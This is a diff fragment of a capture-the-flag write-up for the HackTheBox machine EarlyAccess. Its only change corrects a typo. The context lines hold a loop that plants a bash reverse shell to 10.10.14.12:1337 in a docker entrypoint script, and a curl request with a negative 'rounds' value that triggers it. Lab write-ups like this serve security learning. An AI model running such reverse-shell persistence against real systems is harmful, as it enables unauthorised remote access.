pencer-io/pencer-io.github.io/_posts/2022-02-08-ctf-htb-earlyaccess.md

 drew@earlyaccess:~$ while true; do echo "bash -i >& /dev/tcp/10.10.14.12/1337 0>&1" > /opt/docker-entrypoint.d/pencer.sh && chmod +x /opt/docker-entrypoint.d/pencer.sh && sleep 1; done
 ```

-Leave that running and start another SSH seesion as drew to earlyaccess.htb.
+Leave that running and start another SSH session as drew to earlyaccess.htb.
 From there call the script with autoplay as before, but this time use a negative value:

 ```text
 drew@earlyaccess:/opt/docker-entrypoint.d$ curl -X POST -d "rounds=-3" http://172.19.0.3:9999/autoplay